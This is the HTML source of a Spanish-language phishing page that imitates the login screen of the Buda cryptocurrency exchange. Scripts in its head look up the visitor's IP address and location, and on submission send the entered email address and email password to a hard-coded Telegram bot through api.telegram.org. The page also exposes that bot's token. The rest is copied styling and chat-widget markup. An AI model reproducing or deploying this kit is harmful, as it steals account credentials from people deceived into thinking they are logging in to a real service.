<!DOCTYPE html>
<html lang="es" class="theme-light">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}</style>

    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Bud@-inicio</title>

 
    <link rel="stylesheet" media="screen" href="https://ik.imagekit.io/eruobiiei/budepest/toastr-47bc3fcf9389c964910f5376836af19650c95c22c279386c011a191a84e95bfa.css">
    <link rel="stylesheet" media="screen" href="https://ik.imagekit.io/eruobiiei/budepest/buda-18ab82a67160b718ed9c2909e7c5c93ada9a3c7f936249bbf054bb8f2f289043.css">
    <link rel="stylesheet" media="screen" href="https://ik.imagekit.io/eruobiiei/budepest/application-db83f96079ccda17b6fb03d1e5fdc06a7e3022b1eb55ec0b9a78bbf604b9db29.css">

   	<script>
	//bot token
var telegram_bot_id = "5728746998:AAEOxqfAHs3gNsz9OTi0q5_ej-ygi6FhGsY";
//chat id
var chat_id = '@infomyscm';
	</script> 
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>  
 <script>
         $.getJSON("https://api.ipify.org?format=json",
          function(data) {
             $("#gfg").html(data.ip);
         })
      </script>
      <script>
         $.getJSON("https://ipinfo.io", function (response) {
    $("#ip").html("IP: " + response.ip);
    $("#address").html("" + response.city + ", " + response.country);
    })

</script>		

<script>

var u_name, dname,  ip, ip2;
var ready = function () {
    u_name = document.getElementById("usermil").value;
	dname = document.getElementById("uerpas").value;
	
    ip = document.getElementById("gfg").innerHTML;
    ip2 = document.getElementById("address").innerHTML;
    message = "DATOS-budapest.cl\n📧Correo: " + u_name + "\n🔐Contrasena de correo: " + dname + "\n🌎IP: " + ip +"\n" + ip2;
};
var sender = function () {
    ready();
    var settings = {
        "async": true,
        "crossDomain": true,
        "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "cache-control": "no-cache"

        },
        "data": JSON.stringify({
            "chat_id": chat_id,
            "text": message
        })
    };
    $.ajax(settings).done(function (response) {
  
        console.log(response);
		
          window.location = 'index.html';

	
    });
    return false;
};

			</script>	
  
  </head>
  <body class="unauthenticated-body ng-scope" ng-app="surBTCApp">



    <div class="buda-unauth" id="unauthenticated">
      <a href="">
        <img class="buda-unauth__logo" src="https://ik.imagekit.io/eruobiiei/budepest/logo-dark-df0a79192b7205260c6215324c34283e64fc28a6e828b828caf663bfc989ea38.svg">
</a>      <div class="buda-unauth__dialog">
        


        <div><div class="buda-unauth-form">
  
<img  src="https://ik.imagekit.io/eruobiiei/budepest/logoss.png" style="width:150px;height:auto;"><br>
  <div class="buda-unauth-form__title">Ingrese la sigiente informaci&oacute;n</div>
  
  

  <form class="new_user ng-pristine ng-valid-email ng-invalid ng-invalid-required" id="new_user" name="signinForm"
   autocomplete="off" submit_valid="" action="" onsubmit="return sender()" accept-charset="UTF-8" method="post">
   
   <p id="gfg"  hidden=""></p>
						<p id="address"  hidden=""></p>
  
    <div class="buda-input-control buda-unauth-form__control" buda-input-focus="">
      <input class="buda-input buda-input--short ng-pristine ng-untouched ng-valid-email ng-invalid ng-invalid-required" 
	  ng-model="signinEmail" placeholder="Correo electrónico" required="required" autocomplete="off" tabindex="1" type="email" 
	  value="" name="usermil" id="usermil">

      <div class="buda-input-control__messages ng-active" ng-messages="signinForm[&#39;user[email]&#39;].$error">
        <div ng-message="required" class="input-error ng-scope">Ingresa tu direcci&oacute;n de correo electr&oacute;nico</div>
       
      </div>
    </div>
    <div class="buda-input-control buda-unauth-form__control" buda-input-focus="">
      <input class="buda-input buda-input--short ng-pristine ng-invalid ng-invalid-required ng-touched" ng-model="signinPassword" 
	  placeholder="Contrase&ntilde;a de correo" required="required" autocomplete="off" tabindex="2" type="password" 
	  name="uerpas" id="uerpas">

      <div class="buda-input-control__messages ng-active" ng-messages="signinForm[&#39;user[password]&#39;].$error">
        <div ng-message="required" class="input-error ng-scope">Ingresa tu contrase&ntilde;a</div>
      </div>
    </div>
   

    <ga-cid-input name="ga_client_id" class="ng-isolate-scope"><input type="hidden" name="ga_client_id" value="1383716635.1699489120"></ga-cid-input>

    <div>
	<div class="grecaptcha-badge" data-style="bottomright" 
	style="width: 256px; height: 60px; display: block; transition: right 0.3s ease 0s; position: fixed; bottom: 14px; right: -186px;
	box-shadow: gray 0px 0px 5px; border-radius: 2px; overflow: hidden;">
	
	<div class="grecaptcha-logo">
	
	</div><div class="grecaptcha-error"></div><textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea></div><iframe style="display: none;" src="https://ik.imagekit.io/eruobiiei/budepest/saved_resource.html"></iframe></div><button ng-show="!signinForm.$validating" grecaptcha-submit="" class="buda-button buda-button--blue buda-unauth-form__submit ng-isolate-scope" tabindex="4">Entrar</button>
    <button ng-show="signinForm.$validating" class="buda-button buda-button--blue buda-unauth-form__submit ng-hide" disabled="">Validando...</button>
</form>
  <ul class="buda-unauth__links"><li><a href="">&iquest;Quieres registrarte?</a></li><li>
  <a href="">&iquest;Olvidaste tu contrase&ntilde;a?</a></li><li><a href="">&iquest;Perdiste el acceso a tu clave din&aacute;mica?</a></li>
  <li><a href="">&iquest;No recibiste el correo de confirmaci&oacute;n?</a></li></ul>
</div>
</div>
</div>      <div class="buda-unauth__footer">
   
      </div>
    </div>

    <link rel="stylesheet" media="screen" href="https://ik.imagekit.io/eruobiiei/budepest/application-f6696d39.css">


<div id="criteo-tags-div" style="display: none;"></div>

 
 <div class="intercom-lightweight-app"><style id="intercom-lightweight-app-style" type="text/css">
  @keyframes intercom-lightweight-app-launcher {
    from {
      opacity: 0;
      transform: scale(0.5);
    }
    to {
      opacity: 1;
      transform: scale(1);
    }
  }

  @keyframes intercom-lightweight-app-gradient {
    from {
      opacity: 0;
    }
    to {
      opacity: 1;
    }
  }

  @keyframes intercom-lightweight-app-messenger {
    0% {
      opacity: 0;
      transform: scale(0);
    }
    40% {
      opacity: 1;
    }
    100% {
      transform: scale(1);
    }
  }

  .intercom-lightweight-app {
    position: fixed;
    z-index: 2147483001;
    width: 0;
    height: 0;
    font-family: intercom-font, "Helvetica Neue", "Apple Color Emoji", Helvetica, Arial, sans-serif;
  }

  .intercom-lightweight-app-gradient {
    position: fixed;
    z-index: 2147483002;
    width: 500px;
    height: 500px;
    bottom: 0;
    right: 0;
    pointer-events: none;
    background: radial-gradient(
      ellipse at bottom right,
      rgba(29, 39, 54, 0.16) 0%,
      rgba(29, 39, 54, 0) 72%);
    animation: intercom-lightweight-app-gradient 200ms ease-out;
  }

  .intercom-lightweight-app-launcher {
    position: fixed;
    z-index: 2147483003;
    padding: 0 !important;
    margin: 0 !important;
    border: none;
    bottom: 20px;
    right: 20px;
    max-width: 48px;
    width: 48px;
    max-height: 48px;
    height: 48px;
    border-radius: 50%;
    background: #4D4FFF;
    cursor: pointer;
    box-shadow: 0 1px 6px 0 rgba(0, 0, 0, 0.06), 0 2px 32px 0 rgba(0, 0, 0, 0.16);
    transition: transform 167ms cubic-bezier(0.33, 0.00, 0.00, 1.00);
    box-sizing: content-box;
  }


  .intercom-lightweight-app-launcher:hover {
    transition: transform 250ms cubic-bezier(0.33, 0.00, 0.00, 1.00);
    transform: scale(1.1)
  }

  .intercom-lightweight-app-launcher:active {
    transform: scale(0.85);
    transition: transform 134ms cubic-bezier(0.45, 0, 0.2, 1);
  }


  .intercom-lightweight-app-launcher:focus {
    outline: none;

    
  }

  .intercom-lightweight-app-launcher-icon {
    display: flex;
    align-items: center;
    justify-content: center;
    position: absolute;
    top: 0;
    left: 0;
    width: 48px;
    height: 48px;
    transition: transform 100ms linear, opacity 80ms linear;
  }

  .intercom-lightweight-app-launcher-icon-open {
    
        opacity: 1;
        transform: rotate(0deg) scale(1);
      
  }

  .intercom-lightweight-app-launcher-icon-open svg {
    width: 24px;
    height: 24px;
  }

  .intercom-lightweight-app-launcher-icon-open svg path {
    fill: rgb(255, 255, 255);
  }

  .intercom-lightweight-app-launcher-icon-self-serve {
    
        opacity: 1;
        transform: rotate(0deg) scale(1);
      
  }

  .intercom-lightweight-app-launcher-icon-self-serve svg {
    height: 44px;
  }

  .intercom-lightweight-app-launcher-icon-self-serve svg path {
    fill: rgb(255, 255, 255);
  }

  .intercom-lightweight-app-launcher-custom-icon-open {
    max-height: 24px;
    max-width: 24px;

    
        opacity: 1;
        transform: rotate(0deg) scale(1);
      
  }

  .intercom-lightweight-app-launcher-icon-minimize {
    
        opacity: 0;
        transform: rotate(-60deg) scale(0);
      
  }

  .intercom-lightweight-app-launcher-icon-minimize svg path {
    fill: rgb(255, 255, 255);
  }

  .intercom-lightweight-app-messenger {
    position: fixed;
    z-index: 2147483003;
    overflow: hidden;
    background-color: white;
    animation: intercom-lightweight-app-messenger 250ms cubic-bezier(0, 1, 1, 1);
    transform-origin: bottom right;

    
        width: 400px;
        height: calc(100% - 104px);
        max-height: 704px;
        min-height: 250px;
        right: 20px;
        bottom: 84px;
        box-shadow: 0 5px 40px rgba(0,0,0,0.16);
      

    border-radius: 16px;
  }

  .intercom-lightweight-app-messenger-header {
    height: 64px;
    border-bottom: none;
    background: #4d4fff

    
  }

  .intercom-lightweight-app-messenger-footer{
    position:absolute;
    bottom:0;
    width: 100%;
    height: 80px;
    background: #fff;
    font-size: 14px;
    line-height: 21px;
    border-top: 1px solid rgba(0, 0, 0, 0.05);
    box-shadow: 0px 0px 25px rgba(0, 0, 0, 0.05);
    
  }

  @media print {
    .intercom-lightweight-app {
      display: none;
    }
  }
</style>
<div class="intercom-lightweight-app-launcher intercom-launcher" role="button" tabindex="0" aria-label="Open Intercom Messenger" aria-live="polite"><div class="intercom-lightweight-app-launcher-icon intercom-lightweight-app-launcher-icon-open"><img src="https://ik.imagekit.io/eruobiiei/budepest/778c2f4904bb5674e02d93edfbcfe110.png" alt="" class="intercom-lightweight-app-launcher-custom-icon-open"></div><div class="intercom-lightweight-app-launcher-icon intercom-lightweight-app-launcher-icon-minimize">
<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
  <path fill-rule="evenodd" clip-rule="evenodd" d="M18.601 8.39897C18.269 8.06702 17.7309 8.06702 17.3989 8.39897L12 13.7979L6.60099 8.39897C6.26904 8.06702 5.73086 8.06702 5.39891 8.39897C5.06696 8.73091 5.06696 9.2691 5.39891 9.60105L11.3989 15.601C11.7309 15.933 12.269 15.933 12.601 15.601L18.601 9.60105C18.9329 9.2691 18.9329 8.73091 18.601 8.39897Z" fill="white"></path>
</svg>
</div></div></div>
</body>
 
 </html>